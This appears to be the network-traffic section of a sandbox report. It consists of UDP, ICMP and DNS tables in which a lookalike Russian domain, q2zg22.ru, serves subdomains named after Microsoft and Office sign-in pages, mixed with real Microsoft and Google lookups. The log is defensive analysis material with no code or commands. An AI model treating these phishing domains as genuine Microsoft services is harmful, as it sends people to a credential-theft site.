                                                                                                                          Feb 2, 2024 20:17:40.279836893 CET5457353192.168.2.161.1.1.1
                                                                                                                          Feb 2, 2024 20:17:40.279838085 CET5160253192.168.2.161.1.1.1
                                                                                                                          Feb 2, 2024 20:17:40.281060934 CET5035153192.168.2.161.1.1.1
                                                                                                                          Feb 2, 2024 20:17:40.281267881 CET6410853192.168.2.161.1.1.1
                                                                                                                          Feb 2, 2024 20:17:40.285916090 CET53533561.1.1.1192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:40.397192955 CET53516021.1.1.1192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:40.397218943 CET53545731.1.1.1192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:40.398138046 CET53503511.1.1.1192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:40.398452044 CET53641081.1.1.1192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:40.399827003 CET53525801.1.1.1192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:40.400540113 CET53629311.1.1.1192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:40.515958071 CET138138192.168.2.16192.168.2.255
                                                                                                                          Feb 2, 2024 20:17:41.051841021 CET53640971.1.1.1192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:41.222067118 CET5718553192.168.2.161.1.1.1
                                                                                                                          Feb 2, 2024 20:17:41.223706007 CET5098153192.168.2.161.1.1.1
                                                                                                                          Feb 2, 2024 20:17:41.387953997 CET53571851.1.1.1192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:41.409662008 CET53509811.1.1.1192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:42.357978106 CET6111553192.168.2.161.1.1.1
                                                                                                                          Feb 2, 2024 20:17:42.358553886 CET5770753192.168.2.161.1.1.1
                                                                                                                          Feb 2, 2024 20:17:42.479409933 CET53577071.1.1.1192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:42.635529995 CET53611151.1.1.1192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:43.438702106 CET5822553192.168.2.161.1.1.1
                                                                                                                          Feb 2, 2024 20:17:43.438924074 CET5841853192.168.2.161.1.1.1
                                                                                                                          Feb 2, 2024 20:17:43.559075117 CET53582251.1.1.1192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:43.559375048 CET53584181.1.1.1192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:44.338629007 CET4923453192.168.2.161.1.1.1
                                                                                                                          Feb 2, 2024 20:17:44.339235067 CET6245553192.168.2.161.1.1.1
                                                                                                                          Feb 2, 2024 20:17:44.458184958 CET53492341.1.1.1192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:44.460633039 CET53624551.1.1.1192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:44.712744951 CET5802253192.168.2.161.1.1.1
                                                                                                                          Feb 2, 2024 20:17:44.713181973 CET6358153192.168.2.161.1.1.1
                                                                                                                          Feb 2, 2024 20:17:44.829979897 CET53580221.1.1.1192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:44.830427885 CET53635811.1.1.1192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:45.935147047 CET4934453192.168.2.161.1.1.1
                                                                                                                          Feb 2, 2024 20:17:45.935822010 CET6008553192.168.2.161.1.1.1
                                                                                                                          Feb 2, 2024 20:17:46.053049088 CET53600851.1.1.1192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:46.053117990 CET53493441.1.1.1192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:48.508780003 CET5110353192.168.2.161.1.1.1
                                                                                                                          Feb 2, 2024 20:17:48.509102106 CET5802853192.168.2.161.1.1.1
                                                                                                                          Feb 2, 2024 20:17:48.628871918 CET53511031.1.1.1192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:48.629954100 CET53580281.1.1.1192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:48.749351978 CET6317853192.168.2.161.1.1.1
                                                                                                                          Feb 2, 2024 20:17:48.749584913 CET5160053192.168.2.161.1.1.1
                                                                                                                          Feb 2, 2024 20:17:48.755012035 CET5749553192.168.2.161.1.1.1
                                                                                                                          Feb 2, 2024 20:17:48.755187035 CET5112253192.168.2.161.1.1.1
                                                                                                                          Feb 2, 2024 20:17:48.869930983 CET53631781.1.1.1192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:48.872873068 CET53516001.1.1.1192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:50.391346931 CET5071753192.168.2.161.1.1.1
                                                                                                                          Feb 2, 2024 20:17:50.391534090 CET5669153192.168.2.161.1.1.1
                                                                                                                          Feb 2, 2024 20:17:50.508825064 CET53566911.1.1.1192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:50.509018898 CET53507171.1.1.1192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:54.963963985 CET53584791.1.1.1192.168.2.16
                                                                                                                          Feb 2, 2024 20:17:57.175690889 CET5746953192.168.2.161.1.1.1
                                                                                                                          Feb 2, 2024 20:17:57.176269054 CET6272553192.168.2.161.1.1.1
                                                                                                                          Feb 2, 2024 20:17:57.231235981 CET5453853192.168.2.161.1.1.1
                                                                                                                          Feb 2, 2024 20:17:57.231545925 CET5634853192.168.2.161.1.1.1
                                                                                                                          Feb 2, 2024 20:17:58.128616095 CET53553581.1.1.1192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:00.065681934 CET5456253192.168.2.161.1.1.1
                                                                                                                          Feb 2, 2024 20:18:00.066072941 CET5569153192.168.2.161.1.1.1
                                                                                                                          Feb 2, 2024 20:18:17.039022923 CET53623721.1.1.1192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:31.431273937 CET5986353192.168.2.161.1.1.1
                                                                                                                          Feb 2, 2024 20:18:31.431612015 CET4935753192.168.2.161.1.1.1
                                                                                                                          Feb 2, 2024 20:18:31.553565025 CET53598631.1.1.1192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:31.661520004 CET53493571.1.1.1192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:39.571475029 CET53637251.1.1.1192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:40.055100918 CET53645691.1.1.1192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:50.075787067 CET5389153192.168.2.161.1.1.1
                                                                                                                          Feb 2, 2024 20:18:50.076113939 CET5275553192.168.2.161.1.1.1
                                                                                                                          Feb 2, 2024 20:19:07.333316088 CET53557041.1.1.1192.168.2.16
                                                                                                                          Feb 2, 2024 20:19:09.727653027 CET5276953192.168.2.161.1.1.1
                                                                                                                          Feb 2, 2024 20:19:09.727989912 CET5135153192.168.2.161.1.1.1
                                                                                                                          Feb 2, 2024 20:19:09.844902992 CET53527691.1.1.1192.168.2.16
                                                                                                                          Feb 2, 2024 20:19:09.845123053 CET53513511.1.1.1192.168.2.16
                                                                                                                          TimestampSource IPDest IPChecksumCodeType
                                                                                                                          Feb 2, 2024 20:17:57.423208952 CET192.168.2.161.1.1.1c2ff(Port unreachable)Destination Unreachable
                                                                                                                          Feb 2, 2024 20:18:31.661636114 CET192.168.2.161.1.1.1c23c(Port unreachable)Destination Unreachable
                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                          Feb 2, 2024 20:17:40.279097080 CET192.168.2.161.1.1.10xda3fStandard query (0)sushishop.commander1.comA (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:40.279196024 CET192.168.2.161.1.1.10xacb7Standard query (0)sushishop.commander1.com65IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:40.279836893 CET192.168.2.161.1.1.10x669eStandard query (0)accounts.google.comA (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:40.279838085 CET192.168.2.161.1.1.10x8d99Standard query (0)accounts.google.com65IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:40.281060934 CET192.168.2.161.1.1.10x9505Standard query (0)clients2.google.comA (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:40.281267881 CET192.168.2.161.1.1.10xb57Standard query (0)clients2.google.com65IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:41.222067118 CET192.168.2.161.1.1.10xf07cStandard query (0)galeonconstruction.comA (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:41.223706007 CET192.168.2.161.1.1.10x2ef7Standard query (0)galeonconstruction.com65IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:42.357978106 CET192.168.2.161.1.1.10xcb8dStandard query (0)microsoft-d2vkbmvzwzgf.q2zg22.ruA (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:42.358553886 CET192.168.2.161.1.1.10x2ec0Standard query (0)microsoft-d2vkbmvzwzgf.q2zg22.ru65IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:43.438702106 CET192.168.2.161.1.1.10xdf48Standard query (0)office.q2zg22.ruA (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:43.438924074 CET192.168.2.161.1.1.10x5ab3Standard query (0)office.q2zg22.ru65IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:44.338629007 CET192.168.2.161.1.1.10x398dStandard query (0)react.q2zg22.ruA (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:44.339235067 CET192.168.2.161.1.1.10x8619Standard query (0)react.q2zg22.ru65IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:44.712744951 CET192.168.2.161.1.1.10xe631Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:44.713181973 CET192.168.2.161.1.1.10xb118Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:45.935147047 CET192.168.2.161.1.1.10xf0aaStandard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:45.935822010 CET192.168.2.161.1.1.10x8d86Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:48.508780003 CET192.168.2.161.1.1.10x3d0aStandard query (0)office.q2zg22.ruA (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:48.509102106 CET192.168.2.161.1.1.10x75d3Standard query (0)office.q2zg22.ru65IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:48.749351978 CET192.168.2.161.1.1.10x3cadStandard query (0)ywnjb.q2zg22.ruA (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:48.749584913 CET192.168.2.161.1.1.10x9b38Standard query (0)ywnjb.q2zg22.ru65IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:48.755012035 CET192.168.2.161.1.1.10x98e3Standard query (0)identity.nel.measure.office.netA (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:48.755187035 CET192.168.2.161.1.1.10x2a0dStandard query (0)identity.nel.measure.office.net65IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:50.391346931 CET192.168.2.161.1.1.10xe10Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:50.391534090 CET192.168.2.161.1.1.10x6056Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:57.175690889 CET192.168.2.161.1.1.10x4b7cStandard query (0)logincdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:57.176269054 CET192.168.2.161.1.1.10xda42Standard query (0)logincdn.msftauth.net65IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:57.231235981 CET192.168.2.161.1.1.10x12adStandard query (0)acctcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:57.231545925 CET192.168.2.161.1.1.10xa2a7Standard query (0)acctcdn.msftauth.net65IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:18:00.065681934 CET192.168.2.161.1.1.10x5167Standard query (0)logincdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:18:00.066072941 CET192.168.2.161.1.1.10x778bStandard query (0)logincdn.msftauth.net65IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:18:31.431273937 CET192.168.2.161.1.1.10x9f18Standard query (0)account.q2zg22.ruA (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:18:31.431612015 CET192.168.2.161.1.1.10x4d06Standard query (0)account.q2zg22.ru65IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:18:50.075787067 CET192.168.2.161.1.1.10x2e4dStandard query (0)identity.nel.measure.office.netA (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:18:50.076113939 CET192.168.2.161.1.1.10x775cStandard query (0)identity.nel.measure.office.net65IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:19:09.727653027 CET192.168.2.161.1.1.10xc051Standard query (0)clients1.google.comA (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:19:09.727989912 CET192.168.2.161.1.1.10x6791Standard query (0)clients1.google.com65IN (0x0001)false
                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                          Feb 2, 2024 20:17:40.397218943 CET1.1.1.1192.168.2.160x669eNo error (0)accounts.google.com64.233.185.84A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:40.398138046 CET1.1.1.1192.168.2.160x9505No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:40.398138046 CET1.1.1.1192.168.2.160x9505No error (0)clients.l.google.com142.251.15.113A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:40.398138046 CET1.1.1.1192.168.2.160x9505No error (0)clients.l.google.com142.251.15.100A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:40.398138046 CET1.1.1.1192.168.2.160x9505No error (0)clients.l.google.com142.251.15.138A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:40.398138046 CET1.1.1.1192.168.2.160x9505No error (0)clients.l.google.com142.251.15.101A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:40.398138046 CET1.1.1.1192.168.2.160x9505No error (0)clients.l.google.com142.251.15.139A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:40.398138046 CET1.1.1.1192.168.2.160x9505No error (0)clients.l.google.com142.251.15.102A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:40.398452044 CET1.1.1.1192.168.2.160xb57No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:40.399827003 CET1.1.1.1192.168.2.160xda3fNo error (0)sushishop.commander1.commix-collect-it-prod-481773621.eu-west-3.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:40.399827003 CET1.1.1.1192.168.2.160xda3fNo error (0)mix-collect-it-prod-481773621.eu-west-3.elb.amazonaws.com35.181.229.138A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:40.399827003 CET1.1.1.1192.168.2.160xda3fNo error (0)mix-collect-it-prod-481773621.eu-west-3.elb.amazonaws.com13.37.154.123A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:40.400540113 CET1.1.1.1192.168.2.160xacb7No error (0)sushishop.commander1.commix-collect-it-prod-481773621.eu-west-3.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:41.387953997 CET1.1.1.1192.168.2.160xf07cNo error (0)galeonconstruction.com162.241.124.47A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:42.479409933 CET1.1.1.1192.168.2.160x2ec0No error (0)microsoft-d2vkbmvzwzgf.q2zg22.ru65IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:42.635529995 CET1.1.1.1192.168.2.160xcb8dNo error (0)microsoft-d2vkbmvzwzgf.q2zg22.ru104.21.85.189A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:42.635529995 CET1.1.1.1192.168.2.160xcb8dNo error (0)microsoft-d2vkbmvzwzgf.q2zg22.ru172.67.209.71A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:43.559075117 CET1.1.1.1192.168.2.160xdf48No error (0)office.q2zg22.ru172.67.209.71A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:43.559075117 CET1.1.1.1192.168.2.160xdf48No error (0)office.q2zg22.ru104.21.85.189A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:43.559375048 CET1.1.1.1192.168.2.160x5ab3No error (0)office.q2zg22.ru65IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:44.458184958 CET1.1.1.1192.168.2.160x398dNo error (0)react.q2zg22.ru104.21.85.189A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:44.458184958 CET1.1.1.1192.168.2.160x398dNo error (0)react.q2zg22.ru172.67.209.71A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:44.460633039 CET1.1.1.1192.168.2.160x8619No error (0)react.q2zg22.ru65IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:44.829979897 CET1.1.1.1192.168.2.160xe631No error (0)www.google.com142.250.105.99A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:44.829979897 CET1.1.1.1192.168.2.160xe631No error (0)www.google.com142.250.105.105A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:44.829979897 CET1.1.1.1192.168.2.160xe631No error (0)www.google.com142.250.105.104A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:44.829979897 CET1.1.1.1192.168.2.160xe631No error (0)www.google.com142.250.105.147A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:44.829979897 CET1.1.1.1192.168.2.160xe631No error (0)www.google.com142.250.105.106A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:44.829979897 CET1.1.1.1192.168.2.160xe631No error (0)www.google.com142.250.105.103A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:44.830427885 CET1.1.1.1192.168.2.160xb118No error (0)www.google.com65IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:46.053049088 CET1.1.1.1192.168.2.160x8d86No error (0)aadcdn.msftauth.netcs1100.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:46.053117990 CET1.1.1.1192.168.2.160xf0aaNo error (0)aadcdn.msftauth.netcs1100.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:46.053117990 CET1.1.1.1192.168.2.160xf0aaNo error (0)cs1100.wpc.omegacdn.net152.199.4.44A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:48.628871918 CET1.1.1.1192.168.2.160x3d0aNo error (0)office.q2zg22.ru172.67.209.71A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:48.628871918 CET1.1.1.1192.168.2.160x3d0aNo error (0)office.q2zg22.ru104.21.85.189A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:48.629954100 CET1.1.1.1192.168.2.160x75d3No error (0)office.q2zg22.ru65IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:48.860229969 CET1.1.1.1192.168.2.160x4dd4No error (0)shed.dual-low.part-0012.t-0009.t-msedge.netpart-0012.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:48.860229969 CET1.1.1.1192.168.2.160x4dd4No error (0)part-0012.t-0009.t-msedge.net13.107.213.40A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:48.860229969 CET1.1.1.1192.168.2.160x4dd4No error (0)part-0012.t-0009.t-msedge.net13.107.246.40A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:48.869930983 CET1.1.1.1192.168.2.160x3cadNo error (0)ywnjb.q2zg22.ru104.21.85.189A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:48.869930983 CET1.1.1.1192.168.2.160x3cadNo error (0)ywnjb.q2zg22.ru172.67.209.71A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:48.872873068 CET1.1.1.1192.168.2.160x9b38No error (0)ywnjb.q2zg22.ru65IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:48.874233961 CET1.1.1.1192.168.2.160x2a0dNo error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:48.874787092 CET1.1.1.1192.168.2.160x98e3No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:50.508825064 CET1.1.1.1192.168.2.160x6056No error (0)aadcdn.msftauth.netcs1100.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:50.509018898 CET1.1.1.1192.168.2.160xe10No error (0)aadcdn.msftauth.netcs1100.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:50.509018898 CET1.1.1.1192.168.2.160xe10No error (0)cs1100.wpc.omegacdn.net152.199.4.44A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:57.294394970 CET1.1.1.1192.168.2.160x4b7cNo error (0)logincdn.msftauth.netlgincdn.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:57.294394970 CET1.1.1.1192.168.2.160x4b7cNo error (0)shed.dual-low.part-0013.t-0009.t-msedge.netpart-0013.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:57.294394970 CET1.1.1.1192.168.2.160x4b7cNo error (0)part-0013.t-0009.t-msedge.net13.107.213.41A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:57.294394970 CET1.1.1.1192.168.2.160x4b7cNo error (0)part-0013.t-0009.t-msedge.net13.107.246.41A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:57.295100927 CET1.1.1.1192.168.2.160xda42No error (0)logincdn.msftauth.netlgincdn.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:57.347523928 CET1.1.1.1192.168.2.160x54daNo error (0)shed.dual-low.part-0012.t-0009.t-msedge.netpart-0012.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:57.347523928 CET1.1.1.1192.168.2.160x54daNo error (0)part-0012.t-0009.t-msedge.net13.107.213.40A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:57.347523928 CET1.1.1.1192.168.2.160x54daNo error (0)part-0012.t-0009.t-msedge.net13.107.246.40A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:57.350287914 CET1.1.1.1192.168.2.160x12adNo error (0)acctcdn.msftauth.netacctcdn.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:57.350287914 CET1.1.1.1192.168.2.160x12adNo error (0)shed.dual-low.part-0023.t-0009.t-msedge.netpart-0023.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:57.350287914 CET1.1.1.1192.168.2.160x12adNo error (0)part-0023.t-0009.t-msedge.net13.107.213.51A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:57.350287914 CET1.1.1.1192.168.2.160x12adNo error (0)part-0023.t-0009.t-msedge.net13.107.246.51A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:57.415725946 CET1.1.1.1192.168.2.160x27c7No error (0)shed.dual-low.part-0013.t-0009.t-msedge.netpart-0013.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:57.415725946 CET1.1.1.1192.168.2.160x27c7No error (0)part-0013.t-0009.t-msedge.net13.107.213.41A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:57.415725946 CET1.1.1.1192.168.2.160x27c7No error (0)part-0013.t-0009.t-msedge.net13.107.246.41A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:57.423120975 CET1.1.1.1192.168.2.160xa2a7No error (0)acctcdn.msftauth.netacctcdn.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:57.468133926 CET1.1.1.1192.168.2.160x1cb6No error (0)cs1227.wpc.alphacdn.net192.229.211.199A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:57.535557985 CET1.1.1.1192.168.2.160x5cc1No error (0)scdn1efff.wpc.9da5e.alphacdn.netsni1gl.wpc.alphacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:57.535557985 CET1.1.1.1192.168.2.160x5cc1No error (0)sni1gl.wpc.alphacdn.net152.195.19.97A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:57.535685062 CET1.1.1.1192.168.2.160x550aNo error (0)scdn1efff.wpc.9da5e.alphacdn.netsni1gl.wpc.alphacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:57.588637114 CET1.1.1.1192.168.2.160x7487No error (0)shed.dual-low.part-0013.t-0009.t-msedge.netpart-0013.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:57.588637114 CET1.1.1.1192.168.2.160x7487No error (0)part-0013.t-0009.t-msedge.net13.107.213.41A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:57.588637114 CET1.1.1.1192.168.2.160x7487No error (0)part-0013.t-0009.t-msedge.net13.107.246.41A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:57.602072001 CET1.1.1.1192.168.2.160xa6f3No error (0)shed.dual-low.part-0013.t-0009.t-msedge.netpart-0013.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:57.602072001 CET1.1.1.1192.168.2.160xa6f3No error (0)part-0013.t-0009.t-msedge.net13.107.246.41A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:17:57.602072001 CET1.1.1.1192.168.2.160xa6f3No error (0)part-0013.t-0009.t-msedge.net13.107.213.41A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:18:00.183187962 CET1.1.1.1192.168.2.160x5167No error (0)logincdn.msftauth.netlgincdn.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:18:00.183187962 CET1.1.1.1192.168.2.160x5167No error (0)shed.dual-low.part-0013.t-0009.t-msedge.netpart-0013.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:18:00.183187962 CET1.1.1.1192.168.2.160x5167No error (0)part-0013.t-0009.t-msedge.net13.107.246.41A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:18:00.183187962 CET1.1.1.1192.168.2.160x5167No error (0)part-0013.t-0009.t-msedge.net13.107.213.41A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:18:00.184118032 CET1.1.1.1192.168.2.160x778bNo error (0)logincdn.msftauth.netlgincdn.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:18:31.553565025 CET1.1.1.1192.168.2.160x9f18No error (0)account.q2zg22.ru104.21.85.189A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:18:31.553565025 CET1.1.1.1192.168.2.160x9f18No error (0)account.q2zg22.ru172.67.209.71A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:18:31.661520004 CET1.1.1.1192.168.2.160x4d06No error (0)account.q2zg22.ru65IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:18:50.193569899 CET1.1.1.1192.168.2.160x775cNo error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:18:50.194335938 CET1.1.1.1192.168.2.160x2e4dNo error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:19:09.844902992 CET1.1.1.1192.168.2.160xc051No error (0)clients1.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:19:09.844902992 CET1.1.1.1192.168.2.160xc051No error (0)clients.l.google.com142.250.105.100A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:19:09.844902992 CET1.1.1.1192.168.2.160xc051No error (0)clients.l.google.com142.250.105.101A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:19:09.844902992 CET1.1.1.1192.168.2.160xc051No error (0)clients.l.google.com142.250.105.102A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:19:09.844902992 CET1.1.1.1192.168.2.160xc051No error (0)clients.l.google.com142.250.105.113A (IP address)IN (0x0001)false
